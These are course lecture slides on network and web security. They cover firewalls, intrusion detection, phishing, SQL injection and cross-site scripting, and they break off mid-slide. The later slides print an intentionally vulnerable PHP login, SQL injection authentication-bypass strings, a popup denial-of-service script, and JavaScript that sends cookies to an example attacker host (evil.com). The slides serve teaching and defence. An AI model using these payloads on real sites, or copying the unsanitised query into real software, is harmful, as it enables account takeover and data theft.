Introduction to
Cryptography
Firewall Tasks

• Firewall realizes access control over the

Wenjing Zhang

traffic
– Allow/disallow certain packets
• Firewall may perform other duties:
– Network address translation (NAT)
– Logging (forensics)
– Flagging (intrusion detection)
– Authentication, encryption/decryption (VPN)
– Quality of Service (differentiated services)
• the ability to provide different priority to different
types of traffic, users, or data flows

70
CIS 4520
Introduction to
Cryptography
Firewall Tasks

• Example 1: firewall on a router

Wenjing Zhang

Always allow
HTTP traffic
(TCP port 80)

Port mapping

Allow traffic
from any
client

71
CIS 4520
Introduction to
Cryptography
Firewall Tasks

• Example 2
Wenjing Zhang

Always allow
video conferencing
(TCP/UDP on
7648, 24032)

Only allow a
small range
of IPs.

Log requests
from unknown
sources.

72
CIS 4520
Introduction to
Cryptography
Firewall Tasks

• Example 3
Wenjing Zhang

Always allow
outbound AIM
traffic

From any
internal
computer
To any external
computer

Log all

73
CIS 4520
Introduction to
Cryptography
Firewall Policies

• Firewall filters traffic based on policy

Wenjing Zhang

– policy determines what is the acceptable traffic

– Allow or Deny
– by mapping attributes to IP address and ports

Action Src IP Src Des IP Des Protocol Comment

Port Port
allow * * 10.0.0.10 80 TCP Allow access to Server

allow 10.0.1.0/24 * * 80 TCP Web traffic outbound

deny * * * * * Default

default deny

74
CIS 4520
Introduction to
Cryptography
Default Policy

• Default policy specifies what to do if no

Wenjing Zhang

other policy applies.

• Default deny
– Specifies connectivity that is explicitly
allowed.
– More secure but may break functionality.
– Most organizations default to default deny.
• Default accept
– Specifies connectivity that is explicitly
disallowed
– Less secure but allows functionality.
– Most OSes default to default accept.
75
CIS 4520
Introduction to
Cryptography
Rule Order

• In most firewall policy languages, rule

Wenjing Zhang

order matters!
– Firewall policies are non-monotonic (means a
mix of allow and deny)
– Policy is evaluated until the packet matches a
rule (first match, not best match)
Action Src IP Src Des IP Des Protocol Comment
Port Port
allow * * 10.0.0.10 80 TCP Allow access to Server

deny * * * * * Default

allow 10.0.1.0/24 * * 80 TCP Web traffic outbound

This rule will NOT work

76
CIS 4520
Introduction to
Cryptography
Rule Order

• In most firewall policy languages, rule

Wenjing Zhang

order matters!
– Firewall policies are non-monotonic (means a
mix of allow and deny)
– Policy is evaluated until the packet matches a
rule (first match, not best match)
– Can optimize firewall performance (e.g.,
frequent deny first)
– Can be useful to express complex requirements

77
CIS 4520
Introduction to
Cryptography
Stateless vs. Stateful Package Filters

• Stateless: each packet is considered

Wenjing Zhang

independently
– But a single packet may not contain sufficient
data to make a solid access control decision.
– e.g., TCP packet is part of established session.
• Stateful: allows historical context
consideration
– Records outgoing packets and links incoming
packets to their corresponding outbound
packet’s state.
– More intelligent and provide stronger security
by understanding the flow of traffic over time,
not just snapshots of individual packets.
78
CIS 4520
Introduction to
Cryptography
Application Layer Firewall

• understand application layer protocols

Wenjing Zhang

• can do
– email scanning, filtering
– scrub web pages, e.g., remove javascript
– much more

79
CIS 4520
Introduction to
Cryptography
Firewall Effectiveness

• can a firewall protect against

Wenjing Zhang

– malware spread through email?

– web server vulnerability?
– DNS flaws?

• sure, if you turn these services off

– William Cheswick, “best firewall: pair of
scissors”, meaning that if you completely cut
off a service

• is this realistic?
80
CIS 4520
Introduction to
Cryptography
Firewall Effectiveness

• Firewalls
Wenjing Zhang

– cannot protect against malicious insiders

– cannot protect against connections that don’t
go through it
– cannot protect against completely new threats
– cannot protect fully against viruses

• “hard crunchy outside. soft chewy inside”

– from RFC 1636

81
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

From IDS to Security Intelligence

CIS 4520
Introduction to The Road to Better Situational
Cryptography
Awareness
Wenjing Zhang

Intrusion Detection Systems (1990)

Network flows, Host Intrusion Detection logs, etc.

Security Information and Event Management (SIEM) (mid-2000)

Alarm Correlation, Incident Response

Big Data Security/Analytics (now)

Variety of Data, Security Intelligence

83
CIS 4520
Introduction to
Cryptography
Intrusion

• Intrusion
Wenjing Zhang

– “an Intrusion is unauthorized access to and/or

activity in an information system.”
– if an authorized action … exploits a
vulnerability … causes a compromise …it
becomes a successful attack/intrusion
• outsider gained access to a protected resource
• a buffer overflow has been exploited and then
execute attack code inside a legitimate program
• a program or file has been modified
• system is not behaving “as it should”

84 84
CIS 4520
Introduction to
Cryptography
Intrusion
Wenjing Zhang
• What is Intrusion?
– remote root compromise
– web server defacement
– guessing/cracking passwords
– copying databases containing credit card
numbers
– viewing sensitive data without authorization
– running a packet sniffer
– distributing pirated software
– using an unsecured modem to access internal
network
– impersonating an executive to get information
– using an unattended workstation
85
CIS 4520
Introduction to
Cryptography
Intrusion Detection

• Intrusion Detection [RFC 2828]

Wenjing Zhang

– a security service that monitors and analyzes

system events for the purpose of finding, and
providing real-time or near real-time warning
of, attempts to access system resources in an
unauthorized manner

• Intrusion Prevention
– an extension of ID with exercises of access
control to protect computers from exploitation

86
CIS 4520
Introduction to
Cryptography
Intrusion Detection Systems
Wenjing Zhang

87
CIS 4520
Introduction to
Cryptography
Intrusion Detection Systems
Wenjing Zhang • IDS comprises three logical components:
– sensors
• collect data: packets, logs, system call traces, etc.
– analyzers
• determine if intrusion has occurred
– user interface
• view output or control system behavior

Audit Records
analyzer

Audit Data
Preprocessor

Activity Data
Detection
Detection Engine
Models
Alarms
Action/Report
Decision Decision Engine
Table

88
CIS 4520
Introduction to
Cryptography
IDS Principles
• IDS assumes that intruder behavior differs from
Wenjing Zhang
legitimate users
• Overlap in behaviors causes problems
– false positives or false alarms
– false negatives

89
CIS 4520
Introduction to
Cryptography
Bayesian Detection Rate

• Formal model:
Wenjing Zhang

– Two random variables: given an event

• A denotes an Alarm is generated
• I denotes the event is indeed an Intrusion

– detection rate (true positive): P(A|I)

– So, false negative rate P(!A|I)
– false positive rate: P(A|!I)
– So, true negative rate P(!A|!I)
– Bayesian detection rate: P(I|A)
• given an alarm, how likely it is a real intrusion?

90
CIS 4520
Introduction to
Cryptography
Base-rate Bayesian Fallacy

• According to Bayes Rule:

Wenjing Zhang

Pr(𝐴|𝐼) ∙ Pr(𝐼)
Pr 𝐼 𝐴 =
Pr(𝐴)
• If we know
– Pr(𝐼): the attack probability
• assume 1 attack every 10,000 uses, Pr(𝐼) = 0.0001
– Pr 𝐴 : probability of an alarm (unknown!)
• Law of total probability
• Can derive Pr 𝐴 = Pr 𝐴 𝐼 Pr 𝐼 +
Pr 𝐴 ! 𝐼 Pr(! 𝐼)

91
CIS 4520
Introduction to
Cryptography
Base-rate Bayesian Fallacy
Wenjing Zhang • According to Bayes Rule:
Pr(𝐴|𝐼) ∙ Pr(𝐼)
Pr 𝐼 𝐴 =
Pr(𝐴)
• If we know
– Pr(𝐼): the attack probability
• assume 1 attack every 10,000 uses, Pr(𝐼) = 0.0001
– Pr 𝐴 : probability of an alarm (unknown!)
• Can derive Pr 𝐴 = Pr 𝐴 𝐼 Pr 𝐼 + Pr 𝐴 ! 𝐼 Pr(! 𝐼)
• First, assume the IDS is 99% accurate
– Pr(𝐴|𝐼) = 0.99
– Pr(! 𝐴|𝐼) = 1 − Pr(𝐴|𝐼) = 0.01
– Pr(! 𝐴|! 𝐼) = 0.99
– Pr( 𝐴|! 𝐼) = 0.01
• Pr(𝐴) = 0.99 × 0.0001 + 0.01 × 0.9999 =
0.010098
92
CIS 4520
Introduction to
Cryptography
Base-rate Bayesian Fallacy

• According to Bayes Rule:

Wenjing Zhang

Pr(𝐴|𝐼) ∙ Pr(𝐼)
Pr 𝐼 𝐴 =
Pr(𝐴)
• Now:
0.99×0.0001
– Pr 𝐼|𝐴 = = 0.0098 = 0.98%
0.010098
• Implications:
– a 99% accurate detector only leads to 1%
accurate detection
• 99 false alarms per true alarm
– This is a core problem with IDS!
– Need suppression of false alarms
• however difficult!
93
CIS 4520
Introduction to
Cryptography
Intrusion Detection Approaches
Wenjing Zhang • Anomaly detection
– detects activity that deviates from normal behavior
– defines a profile describing “normal” behavior
• involves the collection of data relating to the behavior of
legitimate users over a period of time
– detects potential attacks
• analyzes the observed behavior to decide if it is of a
legitimate user or of an intruder

probable
intrusion

activity
measures

94
CIS 4520
Introduction to
Cryptography
Intrusion Detection Approaches
Wenjing Zhang • Anomaly detection
– Model legitimate user behavior in a training phase
• A variety of classification approaches
• Statistical
– analyzes observed behavior using univariate,
multivariate, or time-series models
• Knowledge based
– uses a rule-based expert system to classify behaviors
• Machine learning
– Neural network models trained on normal and
malicious network behaviors can autonomously
distinguish between benign and harmful patterns,
using data mining to uncover hidden correlations.
– Once trained, can classify new data as normal or
anomalous based on learned patterns.
• Trade-off between efficiency and cost of detection
95 95
CIS 4520
Introduction to
Cryptography
Intrusion Detection Approaches
Wenjing Zhang • Signature/Heuristic detection
– uses a large set of known malicious data
patterns (signatures) or attack rules (heuristics)
• only identifies known attacks for which it has
patterns or rules
– compares with current behavior
• mostly accurate
pattern
matching

Intrusion
Patterns:
intrusion
Sequences of
system calls,
patterns of network
traffic, etc. activities

96
CIS 4520
Introduction to
Cryptography
Intrusion Detection Approaches
Wenjing Zhang
• Signature approaches
– widely used in anti-virus products, network
traffic scanning proxies, and NIDS
– designed to minimize false alarms by matching
very specific known malicious
– accurate for known threats but ineffective for
new ones
• Rule-based heuristic identification
– define identified suspicious behavior in rules
• rules are system-specific, attack-specific
– can identify new threats by recognizing
suspicious behavior but may yield more false
positives if rules are unclear
97
– E.g., Snort
CIS 4520
Introduction to
Cryptography
Detection Quality
Wenjing Zhang
• FP is more severe in
statistical anomaly
detection (anything
out of the ordinary
might be flagged as a
threat)

• FN is more severe in
signature-based
detection (look for
specific patterns or
signatures of attacks,
may overlook new or
varied attacks it
doesn't recognize.)

An IDS with too many errors becomes useless.

98
CIS 4520
Introduction to
Cryptography
Network-based IDS Example: SNORT
Wenjing Zhang
• Snort is a lightweight NIDS
– rule based
• first released in 1997 but still updated/maintained today
• easily configured
– easily deployed on nodes
• can be run as a sniffer (IDS) or inline (IPS)
– real-time packet capture, uses small amount of
memory and processor time
• 1 CPU w/ 1000 signatures can process 500Mbps
– not great, getting faster now

99 99
CIS 4520
Introduction to
Cryptography
Network-based IDS Example: SNORT
Wenjing Zhang

100 100
CIS 4520
Introduction to
Cryptography
IDS

• Requirements
Wenjing Zhang

– run continually
– be fault tolerant
– resist subversion
– impose a minimal overhead on system
– configured according to system security
policies
– adapt to changes in systems and users
– scale to monitor large numbers of systems
– provide graceful degradation of service
– allow dynamic reconfiguration

101
CIS 4520
Introduction to
Cryptography
IDS vs. Firewall/IPS

• Network IDS
Wenjing Zhang

– Passive monitoring
– Fail-open
• Firewall/IPS
– Active filtering
– Fail-close: not let data in!

102 102
CIS 4520
Introduction to
Cryptography
Security Intelligence
Wenjing Zhang
• Data-driven information security
– bank fraud detection: credit companies have
done this for decades.
– anomaly-based intrusion detection systems.
• Custom-built infrastructure to mine Big
Data for fraud detection was not cost-
effective to scale or adapt for other fraud
detection uses.
• Commercially available Big Data tools and
techniques are now bringing attention to
analytics for fraud detection in healthcare,
insurance, and other fields.
103
CIS 4520
Introduction to
Cryptography
Data Analytics for Intrusion Detection
Wenjing Zhang
• Traditional techniques vs. Big Data
– Storing large amounts of data was not cost-
effective, leading to the deletion of most logs
and computer activity after a fixed retention
period (e.g., 60 days).
– Performing analytics and complex queries on
large, structured data sets was inefficient.
– Traditional tools were not designed to analyze
and manage unstructured data.
– Big Data tools (e.g., Piglatin scripts and regular
expressions) can query data in flexible formats.
– Big Data systems use cluster computing
infrastructures reliable and available.
104
CIS 4520
Introduction to
Cryptography
Data Analytics for Intrusion Detection

• Security intelligence with big data

Wenjing Zhang

– collecting data at a massive scale from many

internal enterprise sources and external sources
such as vulnerability databases.
– performing deeper analytics on the data.
– providing a consolidated view of security-
related information.
– achieving real-time analysis of streaming data.
– Big Data tools still require system architects
and analysts to have a deep knowledge of their
system in order to properly configure the Big
Data analysis tools.

105
CIS 4520
Introduction to
Cryptography
Security Intelligence
Wenjing Zhang

Traditional Systems Big Data Promise

• More rigid, • Structured and
predefined schemas unstructured data treated
• Data gets deleted seamlessly
• Complex analyst • Keep data for historical
queries take long to correlation (e.g., 10 years)
complete • Faster query response
times

106
CIS 4520
Introduction to
Cryptography
Machine Learning for Security

• Classification (Supervised Learning):

Wenjing Zhang

– A machine learning algorithm used to

categorize data points into predefined classes
or categories based on their features.
• Can be used for:
– Intrusion detection, anomaly detection
– Spam filtering
– Software analysis/testing
– Virus/malware detection
– User behavioral analysis

107
CIS 4520
Introduction to
Cryptography
Machine Learning for Security

• Classification (Supervised Learning) for

Wenjing Zhang

Security

108
CIS 4520
Introduction to
Cryptography
Machine Learning for Security
Wenjing Zhang
• Deep neural networks (DNNs) for Security
– Intrusion detection, anomaly detection
– Deep packet inspection
– Feature learning
– Adaptive defense
– Real-time detection

109
CIS 4520
Introduction to
Cryptography
Example: IBM’s Security Intelligence
Wenjing Zhang • Predictive analytics, prioritized threat data,
proactive response
– Multi-vendor event correlation
– Global monitoring
– Threat prioritization
– Sophisticated intelligence reporting
– Real-time analysis
– Automated Intelligence

110
CIS 4520
Introduction to
Cryptography
Example: Zions Bancorporation
Wenjing Zhang • National bank headquartered in Salt Lake
City, Utah.
• Using Hadoop clusters and business
intelligence tools to parse more data more
quickly than with traditional SIEM tools.
– traditional system: searching among a month’s
load of data could take 20 mins ~ an hour.
– new Hadoop system running queries with
Hive: get the same results in about one minute.
– incorporate unstructured and multiple disparate
data sets into a single analytical framework.

111
CIS 4520
Introduction to
Cryptography
Example: APT
Wenjing Zhang • Advanced Persistent Threat (APT)
– Among the most serious information security
threats that organizations face today.
– Operated by sophisticated attackers targeting
specific organizations’ high-value assets, often
spanning months or years.
– Become highly sophisticated and diverse in
technologies, especially in leveraging social
engineering to exploit organization’s
employees and penetrate IT systems
• spear-phishing messages that are customized for
each victim (e.g., emails, SMS, and PUSH
messages); specially crafted malware that may
contain zero-day exploits

112
CIS 4520
Introduction to
Cryptography
Example: APT

• Advanced Persistent Threat (APT)

Wenjing Zhang

– detection relies heavily on the expertise of

human analysts
– custom signatures (unique patterns developed
to detect unrecognized suspicious or malicious
activities) and perform manual investigation
– labor-intensive, difficult to generalize, and not
scalable
– existing anomaly detection proposals
commonly focus on obvious outliers (e.g.,
volume-based), but are ill-suited for stealthy
APT attacks and suffer from high false positive
rates
113
CIS 4520
Introduction to
Cryptography
APT detection

• Large-scale distributed computing for APT

Wenjing Zhang

detection
• MapReduce paradigm
– More efficiently handle highly unstructured
data with arbitrary formats that are captured by
many types of sensors (e.g., Syslog, IDS,
Firewall, NetFlow, and DNS) over long
periods of time
– Massive parallel processing mechanism: use
much more sophisticated detection algorithms
than the traditional SQL-DBMS (transactional
workloads with highly structured data)

114
CIS 4520
Introduction to
Cryptography
APT detection

• Large-scale distributed computing for APT

Wenjing Zhang

detection
• MapReduce paradigm
– Users have the power and flexibility to
incorporate any detection algorithms into the
Map and Reduce functions
– Potential to help analyze more data at once, to
cover more attack paths and possible targets,
and to reveal unknown threats using machine
learning techniques

115
CIS 4520
Introduction to
Cryptography
Application Security

• Web Security
Wenjing Zhang

– Phishing
– SQL Injection
– Cross-Site Scripting (XSS)
• Email Security
– Secure Email
– Spamming

116
CIS 4520
Introduction to
Cryptography
Web Security Vulnerabilities
Wenjing Zhang

Website statistics report from WhiteHat Security: website

vulnerabilities among 7,000 websites analyzed in 2011

117
CIS 4520
Introduction to
Cryptography
Web Security Vulnerabilities
Wenjing Zhang

• Open Web Application Security Project (OWASP)

– software security improvement nonprofit organization
– provides free and open resources, tools, and best practices for
web application security
– known for its OWASP Top 10, a regularly updated list of the
ten most critical web application security risks
– Source: https://owasp.org/www-project-top-ten/

118
CIS 4520
Introduction to
Cryptography
Phishing
Wenjing Zhang

http://67.15.76.201/~guru/negotiations.html

119
CIS 4520
Introduction to
Cryptography
Phishing
Wenjing Zhang

120
CIS 4520
Introduction to
Cryptography
Phishing
Wenjing Zhang

121
CIS 4520
Introduction to
Cryptography
Phishing
Wenjing Zhang

122
CIS 4520
Introduction to
Cryptography
Phishing

• Very simple examples

Wenjing Zhang

• They’re getting more sophisticated

– better copies of pages
– URL tricks
http://www.cnn.com&story=breaking_news@18.
69.0.44/evarady/www/story.htm
• It’s hard for us to distinguish
• Think about average computer user
• How much does your net security depend
on users?

123
CIS 4520
Introduction to
Cryptography
Spoofing Location Bar

• Phisher:
Wenjing Zhang

– Open a new window

– Remove location field from new window
– Draw a fake location field which shows the
spoofed location

124
CIS 4520
Introduction to
Cryptography
Repository of Phishing Sites

• Phish Tank
Wenjing Zhang

• http://www.phishtank.com/

125
CIS 4520
Introduction to
Cryptography
Phish Tank
Wenjing Zhang

126
CIS 4520
Introduction to
Cryptography
Phish Tank
Wenjing Zhang

127
CIS 4520
Introduction to
Cryptography
Phish Tank
Wenjing Zhang

128
CIS 4520
Introduction to
Cryptography
Phish Tank
Wenjing Zhang

129
CIS 4520
Introduction to
Cryptography
Detected by Browsers
Wenjing Zhang

130
CIS 4520
Introduction to
Cryptography
Application Security

• Web Security
Wenjing Zhang

– Phishing
– SQL Injection
– Cross-Site Scripting (XSS)
• Email Security
– Secure Email
– Spamming

131
CIS 4520
Introduction to
Cryptography
Relational Databases
Wenjing Zhang • A type of database that stores and provides
access to data points related to one another
• Essential for organizing and managing
large volumes of data efficiently
• Data is organized in tables (rows and
columns)
• Uses Structured Query Language (SQL)
for data querying and manipulation
• Examples:
– MySQL, PostgreSQL, Oracle Database,
Microsoft SQL Server.

132
CIS 4520
Introduction to
Cryptography
Relational Databases
Wenjing Zhang

133
CIS 4520
Introduction to
Cryptography
Relational Databases
Wenjing Zhang

Name Zipcode Age Sex Disease

Alice 47677 29 F Ovarian Cancer
Betty 47602 22 F Ovarian Cancer
Charles 47678 27 M Prostate Cancer
David 47905 43 M Flu
Emily 47909 52 F Heart Disease
Fred 47906 47 M Heart Disease

Releasing medical datasets

Any issues?
134
CIS 4520
Introduction to
Cryptography
SQL
Wenjing Zhang
• Stands for Structured Query Language
– Standardized programming language for
managing and manipulating relational databases.
– Enables us to create, modify, and query
databases, e.g., inserting, updating, deleting, and
retrieving data from databases.
Select all records
from the 'users'
table, limited to
showing just the
first 30 results

135
CIS 4520
Introduction to
Cryptography
Web Security: Concepts & Terminology
Wenjing Zhang
• HTML (Hypertext Markup Language)
– Used to structure the content of web pages.
– JavaScript can manipulate HTML dynamically to
change content, styles, or layout based on user
interactions or other events.
• JavaScript and PHP are both programming
languages commonly used in web
development, but they serve different
purposes and operate on different parts of a
web application.

136
CIS 4520
Introduction to
Web Security: Concepts & Terminology
Cryptography
• Cookies
Wenjing Zhang
– Small pieces of data stored on the user's browser
by websites they visit. Designed for websites to
remember stateful information, such as
• items added to the shopping cart in an online store
• record the user's browsing activity, including clicking
particular buttons, logins, and visited pages
– Commonly used for session management, user
How is this
possible? authentication, and tracking user preferences.
– Often store session data that verifies the identity
of the user without needing to log in again.
– JavaScript and PHP can manage cookies to read,
write, and delete cookie data.
– Can be exploited in XSS attacks when they
137
contain sensitive information.
CIS 4520
Introduction to
Cryptography
Web Security: Concepts & Terminology
Wenjing Zhang • JavaScript
– A client-side scripting language used to add
interactivity and dynamic behavior to web pages.
– Runs in the user's browser and can manipulate
HTML dynamically.
– Can interact with cookies stored in the user's
browser, allowing for operations such as reading,
writing, and deleting cookie data.
– JavaScript can also be exploited in XSS attacks
when injected into a web page to execute
malicious scripts in the context of other users'
sessions.

138
CIS 4520
Introduction to
Cryptography
Web Security: Concepts & Terminology
Wenjing Zhang • PHP (Hypertext Preprocessor)
– A server-side scripting language used to build
dynamic web pages and web applications.
– Runs on web server and generates HTML content
dynamically, which is then sent to user's browser.
– Can interact with databases, such as MySQL or
PostgreSQL, to retrieve or store data.
– Can handle cookies, both for reading and setting
values, often used for user session management.
– PHP applications are vulnerable to SQL injection
attacks due to improper input sanitization,
enabling attackers to manipulate queries for data
extraction or modification.
139
CIS 4520
Introduction to
Cryptography
Web Security: Concepts & Terminology
Wenjing Zhang • SQL Injection Attack
– Occur when attackers manipulate SQL queries
executed by a web application's backend
database.
– Attackers can extract sensitive data from the
database, modify or delete data, execute
administrative operations, or even take control of
the entire application or server.
– PHP applications are commonly vulnerable to
SQL injection attacks
• when they construct SQL queries using user-controlled
input without proper input sanitization (clean or filter
the input to prevent malicious data from being
processed as part of the HTML )

140
CIS 4520
Introduction to
Cryptography
Web Security: Concepts & Terminology
Wenjing Zhang • SQL Injection Attack: Example
– A PHP-based web application accepts user input
to search for products in a database.
– The application constructs SQL queries
dynamically using the user input without proper
sanitization.
– An attacker exploits this vulnerability by
submitting malicious input containing SQL code.
– The attacker's input modifies the SQL query to
retrieve sensitive information from the database.

141
CIS 4520
Introduction to
Cryptography
Web Security: Concepts & Terminology
Wenjing Zhang • XSS (Cross-Site Scripting) Attack
– Occur when attackers inject malicious scripts
(usually JavaScript) into web pages viewed by
end-users.
– JavaScript is commonly used to execute XSS
attacks by injecting scripts that steal cookies,
redirect users to malicious websites, hijack user
sessions, deface websites, or perform other
unauthorized actions on behalf of the victim.
– PHP applications can also be vulnerable to XSS
attacks when they output user-controlled data
without proper input sanitization, allowing
attackers to inject malicious scripts.

142
CIS 4520
Introduction to
Cryptography
Web Security: Concepts & Terminology
Wenjing Zhang • XSS (Cross-Site Scripting) Attack: Example
– A PHP-based web application allows users to
post comments on a forum.
– The application uses JavaScript to display these
comments dynamically without proper input
sanitization.
– An attacker exploits this vulnerability to inject
malicious JavaScript code into a comment.
– When other users view the comment, the
malicious JavaScript code executes in their
browsers, potentially stealing their session
cookies or performing other malicious actions.

143
CIS 4520
Introduction to
Cryptography
Web Security: Concepts & Terminology
Wenjing Zhang • Interconnections of Terminologies
– In both attack examples, web application
vulnerabilities are exploited by attackers for
malicious actions.
– JavaScript, PHP, and cookies are integral to web
development, and vulnerabilities in these
components can lead to security breaches such as
XSS or SQL injection attacks.
– Proper input validation/sanitization, output
encoding, and security measures are essential to
mitigate risks and protect web applications and
user data.

144
CIS 4520
Introduction to
Cryptography
SQL Injection
Wenjing Zhang

<form action="user.php" method="post">

Username: <input type="text" name="uname"><br>
Password: <input type="password" name="pwd"><br>
<input type="submit">
</form>

145
CIS 4520
Introduction to
Cryptography
SQL Injection

• Backend (server-side) database

Wenjing Zhang

146
CIS 4520
Introduction to
Cryptography
SQL Injection
Wenjing Zhang

This script outputs

results of a SQL
query executed on a
server-side database.

Enter user input .

The query – get the

record of the user.

Wrong username
and/or password.

147
CIS 4520
Introduction to
Cryptography
SQL Injection
Wenjing Zhang

This is the correct

password.

Display user
information.

148
CIS 4520
Introduction to
Cryptography
SQL Injection
Wenjing Zhang

<?php
$user=$_POST["uname"];
$pass=$_POST["pwd"];

//connect to DB………..

$query = "SELECT * FROM users WHERE uname='$user' AND passwd=PASSWORD('$pass')";

echo "<br>Will send this query: <br>".$query."<br><br>";

$result = mysql_query($query) or die('Query failed: ' . mysql_error());

if (mysql_num_rows($result)==0) {
echo "Wrong Username/Password combination. <br> Access Denied<br>";
} else {
echo "user found";
}
149
CIS 4520
Introduction to
Cryptography
SQL Injection
Wenjing Zhang

// Printing results in HTML

echo "<br><br><table border=1>\n";
while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
echo "\t<tr>\n";
foreach ($line as $col_value) {
echo "\t\t<td>$col_value</td>\n";
}
echo "\t</tr>\n";
}
echo "</table>\n";

150
CIS 4520
Introduction to
Cryptography
SQL Injection

• This code snippet demonstrates an insecure

Wenjing Zhang

approach to handling user authentication.

• Q: how can we manipulate the query?
SELECT *
FROM users
WHERE uname='$user'
AND passwd=PASSWORD('$pass')
• With user input:
SELECT *
FROM users
WHERE uname='robert'
AND passwd=PASSWORD('robert')

151
CIS 4520
Introduction to
Cryptography
SQL Injection

• This code snippet demonstrates an insecure

Wenjing Zhang

approach to handling user authentication.

• Q: how can we manipulate the query?
SELECT *
Cause the string to FROM users
end before intended. WHERE uname='robert'
Anything after ' can
be considered as AND passwd=PASSWORD('robert')
separate from the
string. • What if we include a ' in the input to end
the string ?
SELECT *
FROM users
WHERE uname='robert' '
AND passwd=PASSWORD('$pass')
152
CIS 4520
Introduction to
Cryptography
SQL Injection

• Need to terminate the rest of the query.

Wenjing Zhang

How?
SELECT *
FROM users
WHERE uname='robert' # '
AND passwd=PASSWORD('$pass')
• The new query logic:
SELECT *
FROM users
WHERE uname='robert'

153
CIS 4520
Introduction to
Cryptography
SQL Injection
Wenjing Zhang

154
CIS 4520
Introduction to
Cryptography
SQL Injection

• Need to terminate the rest of the query.

Wenjing Zhang

How? You can add your

SELECT * own query logic
FROM users here….
WHERE uname='robert' # '
AND passwd=PASSWORD('$pass')
• Add other query logic…
SELECT *
FROM users
WHERE uname='robert' OR true # '
AND passwd=PASSWORD('$pass')

155
CIS 4520
Introduction to
Cryptography
SQL Injection
Wenjing Zhang

156
CIS 4520
Introduction to
Cryptography
SQL Injection

• Add other query logic…

Wenjing Zhang

SELECT *
FROM users
WHERE uname='0' OR first LIKE 'Jam%' # '
AND passwd=PASSWORD('$pass')

157
CIS 4520
Introduction to
Cryptography
SQL Injection

• SQL Injection
Wenjing Zhang

– Effectively changing the query logic

– May execute shell commands (need support
from database server)
– Responsible for many password breaches
• E.g. Yahoo! Email password disclosure in 2012

– Controls
• Prepared statements – first define query logic (build
the query tree), then pass parameters
• Escaping: disallow certain characters that could be
used maliciously in user input

158
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

159
CIS 4520
Introduction to
Cryptography
Malicious Content Injection
Wenjing Zhang

160
CIS 4520
Introduction to
Cryptography
Malicious Content Injection
Wenjing Zhang

Send a message
to James.

161
CIS 4520
Introduction to
Cryptography
Malicious Content Injection
Wenjing Zhang

James logs in

The message is
displayed

162
CIS 4520
Introduction to
Cryptography
Malicious Content Injection

• Maybe I can send some FUN stuff…

Wenjing Zhang

• Javascript
– A scripting language used to improve the
quality of webpages
• Create dialogs, forms, graphs, …
• Built upon API functions
– Should have NO ability to read local files, or
open connections
– However…

163
CIS 4520
Introduction to
Cryptography
Malicious Content Injection

• Maybe I can send some FUN stuff…

Wenjing Zhang

• Javascript
– However, it’s the source of most recent
security holes in Firefox and IE:
• DoS – the infinite popup script
• Spoofing – easy to create password dialogs
• What if I send:
<script language="javascript">
function popup(){
while (1 == 1) {
window.open("http://www.yahoo.com");
}
}
</script>

164
CIS 4520
Introduction to
Cryptography
Cookies

• Let’s dig further…

Wenjing Zhang

How is this
possible?

165
CIS 4520
Introduction to
Cryptography
Cookies
Wenjing Zhang
• A cookie is a file created by a website to store
user information on the user's browser.
• Offload server state to browsers.
• Contains information that server can use to
remember you, e.g., a unique session identifier
for session management.
Enters form data
Browser
Server
Stores cookie
Includes domain (who can read it), expiration,
“secure” (can be read only over SSL)

Requests cookie
Browser
Server
Returns data

HTTP is a stateless protocol, cookies add state.

166
CIS 4520
Introduction to
Cryptography
Cookies
Wenjing Zhang
Allows users to have cohesive experience
– User authentication
• Use the fact that the user authenticated correctly in
the past to make future authentication quicker
– Personalization
• Recognize the user from a previous visit
– Tracking user preferences
• Follow the user from site to site; learn his/her
browsing behaviour, preferences, and so on

167
CIS 4520
Introduction to
Cryptography
Cookies
Wenjing Zhang • A browser's cookie management window

168
CIS 4520
Introduction to
Cryptography
Cookies
Wenjing Zhang

169
CIS 4520
Introduction to
Cryptography
Cookies

• JavaScript and Cookies…

Wenjing Zhang

• James send this message to Robert:

HTML tag used to
embed JavaScript <script>
code within an
HTML document
alert(document.cookie);
</script> returns a string
containing all cookies
associated with the
A built-in current document
JavaScript function
that creates a pop-
up dialog box with
the specified
• If Robert's email client allows execution of
message JavaScript within emails, then simply
opening the email could trigger the script
to execute
170
CIS 4520
Introduction to
Cryptography
Cookies
Wenjing Zhang

171
CIS 4520
Introduction to
Cryptography
Cookies

• OK, we can use Javascript to access

Wenjing Zhang

cookies
• So what?

172
CIS 4520
Introduction to
Cryptography
Cookies
Wenjing Zhang • James send this to Robert:
<script>
document.getElementById("to").value="james";
document.getElementById("message").value=document.c
ookie;
</script>

• This JavaScript code

‒ modifies the values of two HTML elements on
the webpage: one with the ID “to” and another
with the ID “message”
‒ sets the value of the “to” element to “james”
and the value of the “message” element to the
entire cookie string
173
CIS 4520
Introduction to
Cryptography
Cookies
Wenjing Zhang

174
CIS 4520
Introduction to
Cryptography
Cookies

• OK, we can use Javascript to access

Wenjing Zhang

cookies and forms

• So what?
• Robert will not send the message…

175
CIS 4520
Introduction to
Cryptography
Cookies

• James send this to Robert:

Wenjing Zhang

176
CIS 4520
Introduction to
Cryptography
Cookies
Wenjing Zhang

177
CIS 4520
Introduction to
Cryptography
Cookies

• James gets Robert’s cookies

Wenjing Zhang

178
CIS 4520
Introduction to
Cryptography
Application Security

• Web Security
Wenjing Zhang

– Phishing
– SQL Injection
– Cross-Site Scripting (XSS)
• Email Security
– Secure Email
– Spaming

179
CIS 4520
Introduction to
Cryptography
XSS Attacks
Wenjing Zhang

victim’s
browser naive.com

hello.cgi

GET/ hello.cgi?name=Alice

hello.cgi
executed
<HTML>Hello, dear Alice
Welcome!</HTML>

180
CIS 4520
Introduction to
Cryptography
XSS Attacks: Cookie Theft
Wenjing Zhang
victim’s
evil.com browser naive.com

Access some web page hello.cgi

<FRAME SRC=
http://naive.com/hello.cgi? GET/ hello.cgi?name=
name=<script>win.open( <script>win.open(“http://
“http://evil.com/steal.cgi? evil.com/steal.cgi?cookie”+ hello.cgi
cookie=”+document.cookie) document.cookie)</script>
executed
</script>>
<HTML>Hello, dear
Forces victim’s browser to <script>win.open(“http://
